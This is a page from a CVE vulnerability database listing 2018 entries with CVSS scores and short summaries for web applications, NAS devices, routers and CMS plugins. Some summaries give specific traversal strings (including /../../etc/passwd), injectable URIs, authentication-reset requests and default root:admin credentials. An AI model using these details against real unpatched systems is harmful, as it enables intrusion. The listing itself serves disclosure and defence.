Max CVSS: 10.0 | Min CVSS: 1.9 | Total count: 7584
Columns: ID | CVSS | Summary | Last (major) update | Published
CVE-2018-11511 None
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
16-08-2018 - 16:29 16-08-2018 - 16:29
CVE-2018-11509 None
ASUSTOR ADM 3.1.0.RFQ3 uses the same default root:admin username and password as it does for the NAS itself for applications that are installed from the online repository. This may allow an attacker to login and upload a webshell.
16-08-2018 - 16:29 16-08-2018 - 16:29
CVE-2018-14922 None
Multiple cross-site scripting (XSS) vulnerabilities in Monstra CMS 3.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) first name or (2) last name field in the edit profile page.
14-08-2018 - 14:29 14-08-2018 - 14:29
CVE-2018-14888 None
inc/plugins/thankyoulike.php in the Eldenroot Thank You/Like plugin before 3.1.0 for MyBB allows XSS via a post or thread subject.
14-08-2018 - 14:29 14-08-2018 - 14:29
CVE-2018-13417 None
In Vuze Bittorrent Client 5.7.6.0, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from th
13-08-2018 - 13:29 13-08-2018 - 13:29
CVE-2018-13415 None
In Plex Media Server 1.13.2.5154, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the
13-08-2018 - 13:29 13-08-2018 - 13:29
CVE-2018-14869 None
PHP Template Store Script 3.0.6 allows XSS via the Address line 1, Address Line 2, Bank name, or A/C Holder name field in a profile.
07-08-2018 - 21:29 06-08-2018 - 17:29
CVE-2016-8527 None
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). The vulnerability is present in the VisualRF component of AirWave. By exploiting this vulnerability, an attacker who can trick a log
07-08-2018 - 21:29 06-08-2018 - 16:29
CVE-2016-8526 None
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to an XML external entities (XXE). XXEs are a way to permit XML parsers to access storage that exist on external systems. If an unprivileged user is permitted to control the c
07-08-2018 - 21:29 06-08-2018 - 16:29
CVE-2018-14912 None
cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
06-08-2018 - 21:29 03-08-2018 - 15:29
CVE-2018-14541 None
PHP Scripts Mall Basic B2B Script 2.0.0 has Reflected and Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
05-08-2018 - 21:29 03-08-2018 - 21:29
CVE-2018-14417 None
A command injection vulnerability was found in the web administration console in SoftNAS Cloud before 4.0.3. In particular, the snserv script did not sanitize the 'recentVersion' parameter from the snserv endpoint, allowing an unauthenticated attacke
04-08-2018 - 21:29 03-08-2018 - 21:29
CVE-2018-13416 None
In Universal Media Server (UMS) 7.1.0, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files fro
04-08-2018 - 21:29 03-08-2018 - 13:29
CVE-2018-14840 None
uploads/.htaccess in Subrion CMS 4.2.1 allows XSS because it does not block .html file uploads (but does block, for example, .htm file uploads).
01-08-2018 - 21:29 01-08-2018 - 21:29
CVE-2018-14493 None
Cross-site scripting (XSS) vulnerability in the Groups Page in Open-Audit Community 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the group name.
25-07-2018 - 19:29 25-07-2018 - 19:29
CVE-2018-14335 None
An issue was discovered in H2 1.4.197. Insecure handling of permissions in the backup function allows attackers to read sensitive files (outside of their permissions) via a symlink to a fake database file.
24-07-2018 - 09:29 24-07-2018 - 09:29
CVE-2018-14328 None
Brynamics "Online Trade - Online trading and cryptocurrency investment system" allows remote attackers to obtain sensitive information via a direct request for /dashboard/addplan, /dashboard/paywithcard/charge, /dashboard/withdrawal, or /privacy&term
23-07-2018 - 16:29 23-07-2018 - 16:29
CVE-2018-1513 None
IBM Sterling B2B Integrator Standard Edition 5.2.0 through 5.2.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to c
23-07-2018 - 09:29 23-07-2018 - 09:29
CVE-2018-1563 None
IBM Sterling B2B Integrator Standard Edition (IBM Sterling File Gateway 2.2.0 through 2.2.6) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functional
20-07-2018 - 12:29 20-07-2018 - 12:29
CVE-2018-14418 None
In Msvod Cms v10, SQL Injection exists via an images/lists?cid= URI.
19-07-2018 - 21:29 19-07-2018 - 21:29
CVE-2018-7602 None
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability
19-07-2018 - 13:29 19-07-2018 - 13:29
CVE-2018-14392 None
The New Threads plugin before 1.2 for MyBB has XSS.
18-07-2018 - 22:29 18-07-2018 - 22:29
CVE-2018-14082 None
PHP Scripts Mall JOB SITE (aka Job Portal) 3.0.1 has Cross-site Scripting (XSS) via the search bar.
18-07-2018 - 12:29 18-07-2018 - 12:29
CVE-2018-13862 None
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) allow unauthorized remote attackers to reset the authentication via the "/xml/system/setAttribute.xml" URL, using the GET request "?id=0&attr=protectAccess&newValue
17-07-2018 - 10:29 17-07-2018 - 10:29
CVE-2018-13859 None
MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18, allow unauthorized remote attackers to reset the authentication via the "/xml/system/setAttribute.xml" URL, using the GET request "?i
17-07-2018 - 10:29 17-07-2018 - 10:29
CVE-2018-0710 None
Command injection vulnerability in SSH of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0709 None
Command injection vulnerability in date of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0708 None
Command injection vulnerability in networking of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0707 None
Command injection vulnerability in change password of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0706 None
Exposure of Private Information in QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to access sensitive information.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-13832 None
Multiple Persistent cross-site scripting (XSS) issues in the Techotronic all-in-one-favicon (aka All In One Favicon) plugin 4.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via Apple-Text, GIF-Text, ICO-Text, PNG-Text,
16-07-2018 - 16:29 16-07-2018 - 16:29
CVE-2018-13981 None
The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated remote code execution due to a default component that permits arbitrary upload of PHP files, because the formmailer widget blocks .php files b
16-07-2018 - 10:29 16-07-2018 - 10:29
CVE-2018-13980 None
The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
16-07-2018 - 10:29 16-07-2018 - 10:29
CVE-2018-14064 None
The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
15-07-2018 - 11:29 15-07-2018 - 11:29
CVE-2018-14029 None
CSRF vulnerability in admin/user/edit in Creatiwity wityCMS 0.6.2 allows an attacker to take over a user account, as demonstrated by modifying the account's email field.
12-07-2018 - 22:29 12-07-2018 - 22:29
CVE-2018-12981 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. The vulnerability can be exploited by authenticated and unauthenticated users by sending special crafted requests to the web server allowing injec
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12980 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. The vulnerability allows an authenticated user to upload arbitrary files to the file system with the permissions of the web server.
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12979 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. Weak permissions allow an authenticated user to overwrite critical files by abusing the unrestricted file upload in the WBM.
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12463 None
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an X
12-07-2018 - 12:29 12-07-2018 - 12:29
CVE-2018-13989 None
Grundig Smart Inter@ctive TV 3.0 devices allow CSRF attacks via a POST request to TCP port 8085 containing a predictable ID value, as demonstrated by a /sendrcpackage?keyid=-2544&keysymbol=-4081 request to shut off the device.
11-07-2018 - 12:29 11-07-2018 - 12:29
CVE-2018-13849 None
edit_requests.php in yTakkar Instagram-clone through 2018-04-23 has XSS via an onmouseover payload because of an inadequate XSS protection mechanism based on preg_replace.
10-07-2018 - 14:29 10-07-2018 - 14:29
CVE-2018-13256 None
PHP Scripts Mall Auditor Website 2.0.1 has XSS via the lastname or firstname parameter.
09-07-2018 - 08:29 09-07-2018 - 08:29
CVE-2018-13784 None
PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
09-07-2018 - 06:29 09-07-2018 - 06:29
CVE-2018-13109 None
All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by t
06-07-2018 - 10:29 06-07-2018 - 10:29
CVE-2018-11124 None
Cross-site scripting (XSS) vulnerability in Attributes functionality in Open-AudIT Community edition before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via a crafted attribute name of an Attribute.
06-07-2018 - 10:29 06-07-2018 - 10:29
CVE-2018-8738 None
Airties 5444 1.0.0.18 and 5444TT 1.0.0.18 devices allow XSS.
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12739 None
In BEESCMS 4.0, CSRF allows administrators to be added arbitrarily, a related issue to CVE-2018-10266.
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12520 None
An issue was discovered in ntopng 3.4 before 3.4.180617. The PRNG involved in the generation of session IDs is not seeded at program startup. This results in deterministic session IDs being allocated for active user sessions. An attacker with forekno
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12465 None
An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploi
29-06-2018 - 12:29 29-06-2018 - 12:29
CVE-2018-12464 None
A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to cre
29-06-2018 - 12:29 29-06-2018 - 12:29
CVE-2018-11510 None
ASUSTOR ADM 3.1.2.RHG1 and earlier uses the same default root:admin username and password as it does for the NAS itself for applications that are installed from the online repository. This may allow an attacker to login and upload a webshell.
28-06-2018 - 10:29 28-06-2018 - 10:29
CVE-2018-12912 None
An issue was discovered in admin\controllers\database.php in HongCMS 3.0.0. There is a SQL Injection vulnerability via an admin/index.php/database/operate?dbaction=emptytable&tablename= URI.
27-06-2018 - 14:29 27-06-2018 - 14:29
CVE-2018-12908 None
Brynamics "Online Trade - Online trading and cryptocurrency investment system" allows remote attackers to obtain sensitive information via a direct request for the /dashboard/deposit URI, as demonstrated by discovering database credentials.
27-06-2018 - 12:29 27-06-2018 - 12:29
CVE-2018-12603 None
Cross-site request forgery (CSRF) vulnerability in admin.php in LFCMS 3.7.0 allows remote attackers to hijack the authentication of unspecified users for requests that add administrator users via the s parameter, a related issue to CVE-2018-12114.
25-06-2018 - 16:29 25-06-2018 - 16:29
CVE-2018-12602 None
A CSRF vulnerability exists in LFCMS 3.7.0: users can be added arbitrarily.
25-06-2018 - 11:29 25-06-2018 - 11:29
CVE-2018-10956 None
IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
25-06-2018 - 11:29 25-06-2018 - 11:29
CVE-2018-12705 None
DIGISOL DG-BR4000NG devices have XSS via the SSID (it is validated only on the client side).
24-06-2018 - 19:29 24-06-2018 - 19:29
CVE-2018-12636 6.5
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.
22-06-2018 - 12:29 22-06-2018 - 12:29
CVE-2018-12613 None
An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and
21-06-2018 - 16:29 21-06-2018 - 16:29
CVE-2018-12604 5.0
GreenCMS 2.3.0603 allows remote attackers to obtain sensitive information via a direct request for Data/Log/year_month_day.log.
20-06-2018 - 15:29 20-06-2018 - 15:29
CVE-2018-6563 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in totemomail Encryption Gateway before 6.0.0_Build_371 allow remote attackers to hijack the authentication of users for requests that (1) change user settings, (2) send emails, or (3) change
20-06-2018 - 10:29 20-06-2018 - 10:29
CVE-2018-1132 7.5
A flaw was found in Opendaylight's SDNInterfaceapp (SDNI). Attackers can SQL inject the component's database (SQLite) without authenticating to the controller or SDNInterfaceapp. SDNInterface has been deprecated in OpenDayLight since it was last used
20-06-2018 - 09:29 20-06-2018 - 09:29
CVE-2018-12519 4.0
An issue was discovered in ShopNx through 2017-11-17. The vulnerability allows a remote attacker to upload any malicious file to a Node.js application. An attacker can upload a malicious HTML file that contains a JavaScript payload to steal a user's
19-06-2018 - 17:29 19-06-2018 - 17:29
CVE-2018-11526 6.8
The plugin "WordPress Comments Import & Export" for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.
19-06-2018 - 15:29 19-06-2018 - 15:29
CVE-2018-11525 6.8
The plugin "Advanced Order Export For WooCommerce" for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.
19-06-2018 - 15:29 19-06-2018 - 15:29
CVE-2015-4664 7.5
An improper input validation vulnerability in CA Privileged Access Manager 2.4.4.4 and earlier allows remote attackers to execute arbitrary commands.
18-06-2018 - 14:29 18-06-2018 - 14:29
CVE-2018-12525 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /images/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12524 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /lib/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12523 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /etc/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12522 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /style/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-10969 7.5
SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.
17-06-2018 - 12:29 17-06-2018 - 12:29
CVE-2018-5756 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 does not properly check for folder-to-object association, which allows remote authenticated users
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5755 7.1
Absolute path traversal vulnerability in the readerengine component in Open-Xchange OX App Suite before 7.6.3-rev3, 7.8.x before 7.8.2-rev4, 7.8.3 before 7.8.3-rev5, and 7.8.4 before 7.8.4-rev4 allows remote attackers to read arbitrary files via a fu
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5754 3.5
Cross-site scripting (XSS) vulnerability in the office-web component in Open-Xchange OX App Suite before 7.8.3-rev12 and 7.8.4 before 7.8.4-rev9 allows remote attackers to inject arbitrary web script or HTML via a crafted presentation file, related t
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5753 4.0
The frontend component in Open-Xchange OX App Suite before 7.6.3-rev31, 7.8.x before 7.8.2-rev31, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev20 allows remote attackers to spoof the origin of e-mails via unicode characters in the "personal pa
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5752 6.5
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote attackers to conduct server-side request forgery (SSRF) attacks via vectors involvin
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5751 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote authenticated users to obtain sensitive information about external guest users via v
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2017-17062 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev35, 7.8.x before 7.8.2-rev38, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev19 allows remote authenticated users to save arbitrary user attributes by leveraging improper privile
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-12114 6.8
Maccms 10 allows CSRF via admin.php/admin/admin/info.html to add user accounts.
14-06-2018 - 13:29 14-06-2018 - 13:29
CVE-2018-12254 6.5
router.php in the Harmis Ek rishta (aka ek-rishta) 2.10 component for Joomla! allows SQL Injection via the PATH_INFO to a home/requested_user/Sent%20interest/ URI.
12-06-2018 - 13:29 12-06-2018 - 13:29
CVE-2018-12111 4.3
Cross-site scripting (XSS) vulnerability in the Canon PrintMe EFI webinterface allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /wt3/mydocs.php URI.
11-06-2018 - 09:29 11-06-2018 - 09:29
CVE-2018-12095 3.5
A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
11-06-2018 - 07:29 11-06-2018 - 07:29
CVE-2018-12094 3.5
Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
11-06-2018 - 07:29 11-06-2018 - 07:29
CVE-2018-12090 4.3
There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.
11-06-2018 - 06:29 11-06-2018 - 06:29
CVE-2018-11409 5.0
Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
08-06-2018 - 08:29 08-06-2018 - 08:29
CVE-2018-10088 10.0
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
08-06-2018 - 08:29 08-06-2018 - 08:29
CVE-2018-12055 7.5
Multiple SQL Injections exist in PHP Scripts Mall Schools Alert Management Script via crafted POST data in contact_us.php, faq.php, about.php, photo_gallery.php, privacy.php, and so on.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12054 5.0
Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12053 6.4
Arbitrary File Deletion exists in PHP Scripts Mall Schools Alert Management Script via the img parameter in delete_img.php by using directory traversal.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12052 7.5
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-0296 5.0
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possi
07-06-2018 - 08:29 07-06-2018 - 08:29
CVE-2018-11586 7.5
XML external entity (XXE) vulnerability in api/rest/status in SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
05-06-2018 - 17:29 05-06-2018 - 17:29
CVE-2018-11715 3.5
The Recent Threads plugin before 1.1 for MyBB allows XSS via a thread subject.
04-06-2018 - 13:29 04-06-2018 - 13:29
CVE-2018-11564 3.5
Stored XSS in YOOtheme Pagekit 1.0.13 and earlier allows a user to upload malicious code via the picture upload feature. A user with elevated privileges could upload a photo to the system in an SVG format. This file will be uploaded to the system and
01-06-2018 - 21:29 01-06-2018 - 21:29
CVE-2018-11522 4.3
Yosoro 1.0.4 has stored XSS.
01-06-2018 - 21:29 01-06-2018 - 21:29
CVE-2018-11538 6.8
servlet/UserServlet in SearchBlox 8.6.6 has CSRF via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters because of CSRF Token Bypass.
01-06-2018 - 15:29 01-06-2018 - 15:29
CVE-2018-11671 6.8
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11670 6.8
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11581 3.5
Cross-site scripting (XSS) vulnerability on Brother HL series printers allows remote attackers to inject arbitrary web script or HTML via the url parameter to etc/loginerror.html.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11628 4.3
Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters is not properly sanitized, allowing malicious attackers to send a crafted URL for XSS.
01-06-2018 - 11:29 01-06-2018 - 11:29
CVE-2018-11535 7.5
An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11532 4.3
An issue was discovered in the ChangUonDyU Advanced Statistics plugin 1.0.2 for MyBB. changstats.php has XSS, as demonstrated by a subject field.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11523 7.5
upload.php on NUUO NVRmini 2 devices allows Arbitrary File Upload, such as upload of .php files.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11512 3.5
Stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name
28-05-2018 - 09:29 28-05-2018 - 09:29
CVE-2018-6411 7.5
An issue was discovered in Appnitro MachForm before 4.2.3. When the form is set to filter a blacklist, it automatically adds dangerous extensions to the filters. If the filter is set to a whitelist, the dangerous extensions can be bypassed through ap
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-6410 7.5
An issue was discovered in Appnitro MachForm before 4.2.3. There is a download.php SQL injection via the q parameter.
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-6409 5.0
An issue was discovered in Appnitro MachForm before 4.2.3. The module in charge of serving stored files gets the path from the database. Modifying the name of the file to serve on the corresponding ap_form table leads to a path traversal vulnerabilit
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-11445 6.8
A CSRF issue was discovered on the User Add/System Settings Page (system-settings-user-new2.php) in EasyService Billing 1.0. A User can be added with the Admin role.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11444 7.5
A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11443 4.3
The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11442 6.8
A CSRF issue was discovered in EasyService Billing 1.0, which was triggered via a quotation-new3-new2.php?add=true&id= URI, as demonstrated by adding a new quotation.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11415 4.3
SAP Internet Transaction Server (ITS) 6200.X.X has Reflected Cross Site Scripting (XSS) via certain wgate URIs. NOTE: the vendor has reportedly indicated that there will not be any further releases of this product.
24-05-2018 - 15:29 24-05-2018 - 15:29
CVE-2018-11332 3.5
Stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations in ClipperCMS 1.3.3 allows remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors
24-05-2018 - 12:29 24-05-2018 - 12:29
CVE-2018-11404 4.3
DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter.
24-05-2018 - 03:29 24-05-2018 - 03:29
CVE-2018-11403 3.5
DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter.
24-05-2018 - 03:29 24-05-2018 - 03:29
CVE-2018-8898 7.5
A flaw in the authentication mechanism in the Login Panel of router D-Link DSL-3782 (A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67") allows unauthenticated attackers to perform arbitrary modification (read, w
23-05-2018 - 12:29 23-05-2018 - 12:29
CVE-2018-10094 7.5
SQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.
22-05-2018 - 16:29 22-05-2018 - 16:29
CVE-2018-11339 4.3
An XSS issue was discovered in Frappe ERPNext v11.x.x-develop b1036e5 via a comment.
21-05-2018 - 21:29 21-05-2018 - 21:29
CVE-2018-11096 4.3
Horse Market Sell & Rent Portal Script 1.5.7 has a CSRF vulnerability through which an attacker can change all of the target's account information remotely.
21-05-2018 - 10:29 21-05-2018 - 10:29
CVE-2018-11092 5.8
An issue was discovered in the Admin Notes plugin 1.1 for MyBB. CSRF allows an attacker to remotely delete all admin notes via an admin/index.php?empty=table (aka Clear Table) action.
21-05-2018 - 10:29 21-05-2018 - 10:29
CVE-2018-11094 10.0
An issue was discovered on Intelbras NCLOUD 300 1.0 devices. /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings do not require authentication. For example, when an HTTP POST request is made to /cgi-bin/E
15-05-2018 - 15:29 15-05-2018 - 15:29
CVE-2018-6023 6.8
Fastweb FASTgate 0.00.47 devices are vulnerable to CSRF, with impacts including Wi-Fi password changing, Guest Wi-Fi activating, etc.
11-05-2018 - 17:29 11-05-2018 - 17:29
CVE-2018-10832 4.3
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based, which are vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a u
11-05-2018 - 17:29 11-05-2018 - 17:29
CVE-2018-10580 3.5
The "Latest Posts on Profile" plugin 1.1 for MyBB has XSS because there is an added section in a user profile that displays that user's most recent posts without sanitizing the tsubject (aka thread subject) field.
11-05-2018 - 10:29 11-05-2018 - 10:29
CVE-2018-10314 3.5
Cross-site scripting (XSS) vulnerability in Open-AudIT Community 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the action parameter in the Discover -> Audit Scripts -> List
09-05-2018 - 23:29 09-05-2018 - 23:29
CVE-2015-1503 7.8
Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash
08-05-2018 - 16:29 08-05-2018 - 16:29
CVE-2018-1247 5.8
RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted
08-05-2018 - 09:29 08-05-2018 - 09:29
CVE-2018-10757 7.5
CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.
05-05-2018 - 15:29 05-05-2018 - 15:29
CVE-2018-9302 6.4
SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter. NOTE: this vulnerability exists because of an inc
02-05-2018 - 11:29 02-05-2018 - 11:29
CVE-2018-10260 6.5
A Local File Inclusion vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10259 3.5
An Authenticated Stored XSS vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10258 6.5
A CSV Injection vulnerability was discovered in Shopy Point of Sale v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
